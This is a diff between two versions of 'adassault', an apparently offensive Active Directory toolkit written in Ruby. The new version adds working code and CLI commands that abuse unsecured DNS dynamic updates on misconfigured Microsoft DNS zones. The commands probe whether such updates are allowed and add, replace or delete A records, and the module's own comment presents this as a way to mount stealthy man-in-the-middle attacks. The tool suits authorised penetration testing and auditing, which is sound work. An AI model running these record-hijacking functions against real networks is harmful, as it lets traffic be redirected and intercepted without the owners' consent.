adassault 0.0.1 → 0.0.2

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: b131722d9575f757c8cdf53cac4e4419d9968d5eeb11a66dabb4ef542fe85a5c
-  data.tar.gz: bf1de9fd4ddc2dd772980bc93945fd23309e5c7634e79bcb1171530e5b48db9c
+  metadata.gz: 1388914e53e2194919173dcbe9cc809e1fff39b3843f8768459343ac68812fa3
+  data.tar.gz: 9c81ba10c6f2fc8dc0858b2bea49e3b399515d4d471b2255e469a9430f386425
 SHA512:
-  metadata.gz: bf803a032eb88ccc4444eebbf32c8edf94dc724ceec842e82855e6e75943e75e84e01514633f33f09565017dae052698d23ae7973b895863298f9318131eddbe
-  data.tar.gz: 31826ce2fed8ac57816ecbcfcd3063ea985f94f5dbdc908fcb0f51af5ae89d518866a20daad76e73f78ed1b2b0ecfeaf1ea823b2517591d2c29e8d566fbbba89
+  metadata.gz: aabce798d3bf5b4bd1831751ee0416852f2904b439781d1e74fd41a3793dba6c17152ba991b6d334bf6b4507f4e892389697c7a90b8da527a292992faf26472e
+  data.tar.gz: d754da4dcf1516025be52d5e49a594f04d117717c8f82058b12899332a651a01c177387aa43a4ff80e7fb1c852a614c2f4f6f787f516e7e2d79f8726502b20b8

data/lib/adassault/cli/dns/duzdu/add.rb

@@ -0,0 +1,34 @@
+# frozen_string_literal: true
+
+require 'adassault/cli/dns/duzdu/baseaction'
+
+module ADAssault
+  class CLI
+    module DNS
+      module DUZDU
+        # command: `ada dns duzdu add`
+        class Add < BaseAction
+          def run(args)
+            res = @duz.addv4(args[0], args[1])
+            @duz.display(res, self.class.command_name)
+          end
+
+          class << self
+            def description
+              'Add a DNS A record (IPv4) via dynamic updates'
+            end
+
+            def long_description
+              '<name>: DNS name, A record. The domain is automatically appended, e.g. test ➡️ test.example.org' \
+                "\n\n<ip>: IP address."
+            end
+
+            def arguments
+              %i[<name> <ip>]
+            end
+          end
+        end
+      end
+    end
+  end
+end

data/lib/adassault/cli/dns/duzdu/baseaction.rb

@@ -0,0 +1,59 @@
+# frozen_string_literal: true
+
+# AD Assault lib
+require 'adassault/dns'
+# options / arguments parsing lib
+require 'gli'
+
+module ADAssault
+  class CLI
+    extend GLI::App
+
+    module DNS
+      module DUZDU
+        # stuff common to all duzdu's sub-commands
+        class BaseAction
+          def initialize(options)
+            parent_options = options.dig(GLI::Command::PARENT, GLI::Command::PARENT)
+            dns_opts = parent_options[:nameserver].nil? ? nil : { nameserver: [parent_options[:nameserver]] }
+            @duz = ADAssault::DNS::DUZDU.new(parent_options[:domain], dns_opts)
+          end
+
+          def run(_args)
+            raise NotImplementedError, 'Sub-class must implement this method'
+          end
+
+          class << self
+            def command_name
+              name.split('::').last.downcase
+            end
+
+            def description
+              raise NotImplementedError, 'Sub-class must implement this method'
+            end
+
+            def long_description
+              raise NotImplementedError, 'Sub-class must implement this method'
+            end
+
+            def arguments
+              raise NotImplementedError, 'Sub-class must implement this method'
+            end
+
+            def register(parent_command)
+              parent_command.desc description
+              parent_command.long_desc long_description unless long_description.empty?
+              arguments.each { |argument| parent_command.arg argument } # won't register args if arguments is empty
+              parent_command.command command_name.to_sym do |cmd|
+                cmd.action do |_global_options, options, args|
+                  action = new(options)
+                  action.run(args)
+                end
+              end
+            end
+          end
+        end
+      end
+    end
+  end
+end

data/lib/adassault/cli/dns/duzdu/check.rb

@@ -0,0 +1,33 @@
+# frozen_string_literal: true
+
+require 'adassault/cli/dns/duzdu/baseaction'
+
+module ADAssault
+  class CLI
+    module DNS
+      module DUZDU
+        # command: `ada dns duzdu check`
+        class Check < BaseAction
+          def run(_args)
+            res = @duz.checkv4
+            @duz.display(res, self.class.command_name)
+          end
+
+          class << self
+            def description
+              'Check if unsecure dynamic updates are allowed (IPv4)'
+            end
+
+            def long_description
+              ''
+            end
+
+            def arguments
+              []
+            end
+          end
+        end
+      end
+    end
+  end
+end

data/lib/adassault/cli/dns/duzdu/delete.rb

@@ -0,0 +1,33 @@
+# frozen_string_literal: true
+
+require 'adassault/cli/dns/duzdu/baseaction'
+
+module ADAssault
+  class CLI
+    module DNS
+      module DUZDU
+        # command: `ada dns duzdu delete`
+        class Delete < BaseAction
+          def run(args)
+            res = @duz.deletev4(args[0])
+            @duz.display(res, self.class.command_name)
+          end
+
+          class << self
+            def description
+              'Remove a DNS A record (IPv4) via dynamic updates'
+            end
+
+            def long_description
+              '<name>: DNS name, A record. The domain is automatically appended, e.g. test ➡️ test.example.org'
+            end
+
+            def arguments
+              %i[<name>]
+            end
+          end
+        end
+      end
+    end
+  end
+end

data/lib/adassault/cli/dns/duzdu/get.rb

@@ -0,0 +1,34 @@
+# frozen_string_literal: true
+
+require 'adassault/cli/dns/duzdu/baseaction'
+
+module ADAssault
+  class CLI
+    module DNS
+      module DUZDU
+        # command: `ada dns duzdu get`
+        class Get < BaseAction
+          def run(args)
+            name = args.first
+            res = @duz.getv4(name)
+            @duz.display_record(name, res)
+          end
+
+          class << self
+            def description
+              'Get the value(s) of a DNS A record (IPv4) from the domain'
+            end
+
+            def long_description
+              '<name>: DNS name, A record. The domain is automatically appended, e.g. test ➡️ test.example.org'
+            end
+
+            def arguments
+              %i[<name>]
+            end
+          end
+        end
+      end
+    end
+  end
+end

data/lib/adassault/cli/dns/duzdu/replace.rb

@@ -0,0 +1,34 @@
+# frozen_string_literal: true
+
+require 'adassault/cli/dns/duzdu/baseaction'
+
+module ADAssault
+  class CLI
+    module DNS
+      module DUZDU
+        # command: `ada dns duzdu replace`
+        class Replace < BaseAction
+          def run(args)
+            res = @duz.replacev4(args[0], args[1])
+            @duz.display(res, self.class.command_name)
+          end
+
+          class << self
+            def description
+              'Change the value of an existing DNS A record (IPv4) via dynamic updates'
+            end
+
+            def long_description
+              '<name>: DNS name, A record. The domain is automatically appended, e.g. test ➡️ test.example.org' \
+                "\n\n<ip>: IP address."
+            end
+
+            def arguments
+              %i[<name> <ip>]
+            end
+          end
+        end
+      end
+    end
+  end
+end

data/lib/adassault/cli/dns/duzdu.rb

@@ -0,0 +1,19 @@
+# frozen_string_literal: true
+
+# AD Assault CLI: DUZDU sub-commands
+require 'adassault/cli/dns/duzdu/add'
+require 'adassault/cli/dns/duzdu/check'
+require 'adassault/cli/dns/duzdu/delete'
+require 'adassault/cli/dns/duzdu/get'
+require 'adassault/cli/dns/duzdu/replace'
+
+module ADAssault
+  class CLI
+    # command: `ada dns`
+    module DNS
+      # command: `ada dns duzdu`
+      module DUZDU
+      end
+    end
+  end
+end

data/lib/adassault/cli/dns.rb

@@ -1,47 +1,39 @@
 # frozen_string_literal: true
 
-require 'adassault/dns'
+require 'adassault/cli/dns/duzdu'
 require 'gli'
 
 module ADAssault
   class CLI
     extend GLI::App
 
-    desc 'DNS related commands'
+    # dns
     # since 0.0.1
+    desc 'DNS related commands'
     command :dns do |dns|
-      dns.desc 'Spot all domain controllers in a Microsoft Active Directory environment'
+      dns.flag %i[d domain], desc: 'Active Directory domain.', type: String, required: true, arg_name: 'DOMAIN'
+      dns.flag %i[s nameserver name-server],
+               desc: 'The IP address of the domain DNS server. If not provided uses your system DNS.',
+               type: String, required: false, arg_name: 'IP_ADDRESS'
+
+      # dns find_dcs
       # since 0.0.1
+      dns.desc 'Spot all domain controllers in a Microsoft Active Directory environment'
       dns.command :find_dcs do |find_dcs|
-        find_dcs.flag %i[d domain], desc: 'Active Directory domain.', type: String, required: false
-        find_dcs.flag %i[s nameserver name-server],
-                      desc: 'The IP address of the domain DNS server. If not provided uses your system DNS.',
-                      type: String
         find_dcs.action do |_global_options, options, _args|
-          dns_opts = options[:nameserver].nil? ? nil : { nameserver: [options[:nameserver]] }
-          dcd = ADAssault::DNS::FindDCs.new(options[:domain], dns_opts)
+          parent_options = options[GLI::Command::PARENT]
+          dns_opts = parent_options[:nameserver].nil? ? nil : { nameserver: [parent_options[:nameserver]] }
+          dcd = ADAssault::DNS::FindDCs.new(parent_options[:domain], dns_opts)
           dcd.display
         end
       end
 
-      dns.desc 'TODO'
-      dns.command :entry_add do |entry_add|
-        entry_add.action do |_global_options, _options, _args|
-          puts 'entry_add'
-        end
-      end
-
-      dns.desc 'TODO'
-      dns.command :entry_delete do |entry_delete|
-        entry_delete.action do |_global_options, _options, _args|
-          puts 'entry_delete'
-        end
-      end
-
-      dns.desc 'TODO'
-      dns.command :entry_update do |entry_update|
-        entry_update.action do |_global_options, _options, _args|
-          puts 'entry_update'
+      # dns duzdu
+      # since 0.0.2
+      dns.desc 'DNS unsecure zone dynamic update (DUZDU)'
+      dns.command :duzdu do |duzdu|
+        %w[add check delete get replace].each do |sub_command|
+          DNS::DUZDU.const_get(sub_command.capitalize).register(duzdu)
         end
       end
     end

data/lib/adassault/cli.rb

@@ -14,6 +14,7 @@ module ADAssault
     extend GLI::App
 
     program_desc 'ADAsault desc'
+    arguments :strict
     subcommand_option_handling :normal
     sort_help :alpha # :manually
     version ADAssault::VERSION

data/lib/adassault/dns/duzdu.rb

@@ -0,0 +1,175 @@
+# frozen_string_literal: true
+
+require 'ipaddr'
+require 'random/formatter'
+
+require 'dnsruby'
+require 'paint'
+
+module ADAssault
+  module DNS
+    # **DNS unsecure zone dynamic update (DUZDU).**
+    #
+    # On a misconfigured MS DNS zone, one can abuse dynamic updates to perform MiTM attacks in a very stealth way.
+    #
+    # On a Windows server with the DNS role, the `DSPROPERTY_ZONE_ALLOW_UPDATE` property defines whether dynamic updates are allowed. See [Microsoft - MS-DNSP - 2.3.2.1.1 Property Id](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dnsp/3af63871-0cc4-4179-916c-5caade55a8f3).
+    # The possible values (`fAllowUpdate`) are (see [Microsoft - MS-DNSP - 2.2.5.2.4.1 DNS_RPC_ZONE_INFO_W2K](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dnsp/e8651544-0fbb-4038-8232-375ff2d8a55e)):
+    #
+    # - `0` (`ZONE_UPDATE_OFF`): No updates are allowed for the zone.
+    # - `1` (`ZONE_UPDATE_UNSECURE`): All updates (secure and unsecure) are allowed for the zone.
+    # - `2` (`ZONE_UPDATE_SECURE`): The zone only allows secure updates, that is, DNS packet MUST have a TSIG [RFC2845] present in the additional section.
+    #
+    # One can see the property when connected to the DNS server (near 100% of times on the domain controller), with the command: `dnscmd.exe /ZoneInfo <example: thm.local>` and the value of `update`.
+    # Another option with the GUI, is to launch `DNS Manager` on the Windows server, then unfold the tree until the DNS zone, right click on it, select `Properties`, on the `General` tab, see the value of the select fields named `Dynamic updates`.
+    # Of course it is also possible to check remotly by trying to create a record. (see {DUZDU#checkv4})
+    #
+    # References:
+    #
+    # - [[FR] ANSSI - Points de contrôle Active Directory - Zones DNS mal configurées (vuln_dnszone_bad_prop)](https://www.cert.ssi.gouv.fr/uploads/ad_checklist.html)
+    # - [[FR] ANSSI - Bulletin d'alerte du CERT-FR - Multiples vulnérabilités dans Microsoft DNS server - CERTFR-2021-ALE-005](https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-005/)
+    # - [[EN] RFC 2136 - Dynamic Updates in the Domain Name System (DNS UPDATE)](https://datatracker.ietf.org/doc/html/rfc2136)
+    # - [[EN] RFC 2845 - Secret Key Transaction Authentication for DNS (TSIG)](https://datatracker.ietf.org/doc/html/rfc2845)
+    # - [[EN] RFC 3007 - Secure Domain Name System (DNS) Dynamic Update](https://datatracker.ietf.org/doc/html/rfc3007)
+    # - [[EN] RFC 4033 - DNS Security Introduction and Requirements](https://datatracker.ietf.org/doc/html/rfc4033)
+    # - [[EN] RFC 4034 - Resource Records for the DNS Security Extensions](https://datatracker.ietf.org/doc/html/rfc4034)
+    # - [[EN] RFC 4035 - Protocol Modifications for the DNS Security Extensions](https://datatracker.ietf.org/doc/html/rfc4035)
+    # - [[EN] RFC 6895 - Domain Name System (DNS) IANA Considerations](https://datatracker.ietf.org/doc/html/rfc6895)
+    # - [[EN] RFC 8945 - Secret Key Transaction Authentication for DNS (TSIG)](https://datatracker.ietf.org/doc/html/rfc8945)
+    # @since 0.0.2
+    class DUZDU
+      # **Create the DUZDU object**
+      # @param ad_domain [String] the Active Directory domain to work on.
+      # @param dns_opts [Hash] options for the DNS resolver. See [Resolv::DNS.new](https://ruby-doc.org/3.3.0/stdlibs/resolv/Resolv/DNS.html#method-c-new).
+      # @option dns_opts [Array|String] :nameserver the DNS server to contact
+      # @example
+      #   duz = ADAssault::DNS::DUZDU.new('THM.local', nameserver: ['10.10.30.209'])
+      def initialize(ad_domain, dns_opts = nil)
+        @ad_domain = ad_domain
+        @dns_opts = dns_opts
+      end
+
+      # **Change the value of an existing DNS A record (IPv4) via dynamic updates**
+      #
+      # It will remove and recreate the record.
+      #
+      # **Warning**: if several entries exist for the same record, they will all be replaced by the new value.
+      # @param name [String] DNS name, A record. The domain is automatically appended, e.g. `test` ➡️ `test.example.org`
+      # @param ip [String] IP address
+      # @return [TrueClass|FalseClass] `true` if the record was changed successfully
+      # @example
+      #   duz.replacev4('noraj', '10.10.56.126') # => true
+      def replacev4(name, ip)
+        deletev4(name)
+        addv4(name, ip)
+      end
+
+      # **Add a DNS A record (IPv4) via dynamic updates**
+      #
+      # **Warning**: adding 2nd value the same name will result in two entries for the same record, not updating the name (for that use {replacev4}).
+      # @param name [String] DNS name, A record. The domain is automatically appended, e.g. `test` ➡️ `test.example.org`
+      # @param ip [String] IP address
+      # @return [TrueClass|FalseClass] `true` if the record was added successfully
+      # @example
+      #   duz.addv4('noraj', '10.10.56.125') # => true
+      def addv4(name, ip)
+        update = Dnsruby::Update.new(@ad_domain)
+        update.add("#{name}.#{@ad_domain}.", 'A', 300, ip)
+        send_update(update)
+      end
+
+      # **Remove a DNS A record (IPv4) via dynamic updates**
+      #
+      # **Warning**: if several entries exist for the same record, they will all be deleted.
+      # @param name [String] DNS name, A record. The domain is automatically appended, e.g. `test` ➡️ `test.example.org`
+      # @return [TrueClass|FalseClass] `true` if the record was removed successfully
+      # @example
+      #   duz.deletev4('noraj') # => true
+      def deletev4(name)
+        update = Dnsruby::Update.new(@ad_domain)
+        update.present("#{name}.#{@ad_domain}", 'A')
+        update.delete("#{name}.#{@ad_domain}", 'A')
+        send_update(update)
+      end
+
+      # rubocop:disable Metrics/AbcSize
+
+      # **Check if unsecure dynamic updates are allowed (IPv4)**
+      #
+      # It will try to create a random IPv4 record in the zone and remove it.
+      # @return [TrueClass|FalseClass] `true` means unsecure dynamic updates are enabled
+      # @example
+      #   duz.checkv4 # => false
+      def checkv4
+        networks = ['10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16'].map { |x| IPAddr.new(x) }
+        network = networks.sample
+        name = Random.uuid_v4
+        ip = IPAddr.new(rand(network.to_range.begin.succ.to_i..network.to_range.end.to_i - 1), network.family)
+        created = addv4(name, ip)
+        # if created
+        #   deletev4(name)
+        #   true
+        # else
+        #   false
+        # end
+        created ? deletev4(name) || true : false
+      end
+      # rubocop:enable Metrics/AbcSize
+
+      # **Get the value(s) of a DNS A record (IPv4)**
+      # @param name [String] DNS name, A record. The domain is automatically appended, e.g. `test` ➡️ `test.example.org`
+      # @return [Array<String>] the IP address(es) as string(s)
+      # @example
+      #   duz.getv4('noraj') # => ["10.10.56.128", "10.10.56.126"]
+      def getv4(name)
+        Dnsruby::DNS.open(@dns_opts) do |dns|
+          ress = dns.getresources("#{name}.#{@ad_domain}", 'A')
+          ress.map { |x| x.address.to_s }
+        rescue Dnsruby::NXDomain # The requested domain does not exist
+          ['']
+        end
+      end
+
+      # Display a CLI-friendly output showing if the executed method was successful or not
+      # @param success [TrueClass|FalseClass] result of the command
+      # @param cmd [String] name of the executed command
+      # @return [nil]
+      def display(success, cmd)
+        # allowed_methods = DUZDU.public_instance_methods(false) - [:display]
+        # success = allowed_methods.include?(cmd.to_sym) ? send(cmd) : nil
+        message = if success
+                    Paint["✅ #{cmd} was executed successfully",
+                          'green']
+                  else
+                    Paint["❌ #{cmd} was unsuccessful", 'red']
+                  end
+        puts message
+      end
+
+      # Display a CLI-friendly output formating the DNS record with its FQDN and IP addresses.
+      # @param name [String] record name, e.g. the argument of {getv4}
+      # @param ips [Array<String>] list of IP addresses, e.g. the return value of {getv4}
+      # @return [nil]
+      def display_record(name, ips)
+        fqdn = "#{name}.#{@ad_domain}"
+        puts "#{Paint[fqdn, 'cyan']} - #{Paint[ips.join(', '), 'aquamarine']}"
+      end
+
+      protected
+
+      # **Send a DNS update request via dynamic updates**
+      # @param update [Dnsruby::Update]
+      # @return [TrueClass|FalseClass] `true` if the update succeeded
+      # @example see {addv4} and {deletev4}
+      def send_update(update)
+        res = Dnsruby::Resolver.new(@dns_opts)
+        begin
+          res.send_message(update)
+          true
+        rescue Dnsruby::ResolvError, Dnsruby::ResolvTimeout => e
+          puts "Update failed: #{e}"
+          false
+        end
+      end
+    end
+  end
+end

data/lib/adassault/dns.rb

@@ -1,3 +1,4 @@
 # frozen_string_literal: true
 
+require 'adassault/dns/duzdu'
 require 'adassault/dns/find_dcs'

data/lib/adassault/version.rb

@@ -2,5 +2,5 @@
 
 module ADAssault
   # Version of ADAssault library and app
-  VERSION = '0.0.1'
+  VERSION = '0.0.2'
 end

metadata

@@ -1,15 +1,35 @@
 --- !ruby/object:Gem::Specification
 name: adassault
 version: !ruby/object:Gem::Version
-  version: 0.0.1
+  version: 0.0.2
 platform: ruby
 authors:
 - Alexandre ZANNI
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2024-06-23 00:00:00.000000000 Z
+date: 2024-07-31 00:00:00.000000000 Z
 dependencies:
+- !ruby/object:Gem::Dependency
+  name: dnsruby
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.72'
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: 1.72.1
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.72'
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: 1.72.1
 - !ruby/object:Gem::Dependency
   name: gli
   requirement: !ruby/object:Gem::Requirement
@@ -53,7 +73,15 @@ files:
 - lib/adassault.rb
 - lib/adassault/cli.rb
 - lib/adassault/cli/dns.rb
+- lib/adassault/cli/dns/duzdu.rb
+- lib/adassault/cli/dns/duzdu/add.rb
+- lib/adassault/cli/dns/duzdu/baseaction.rb
+- lib/adassault/cli/dns/duzdu/check.rb
+- lib/adassault/cli/dns/duzdu/delete.rb
+- lib/adassault/cli/dns/duzdu/get.rb
+- lib/adassault/cli/dns/duzdu/replace.rb
 - lib/adassault/dns.rb
+- lib/adassault/dns/duzdu.rb
 - lib/adassault/dns/find_dcs.rb
 - lib/adassault/version.rb
 homepage: https://noraj.github.io/adassault/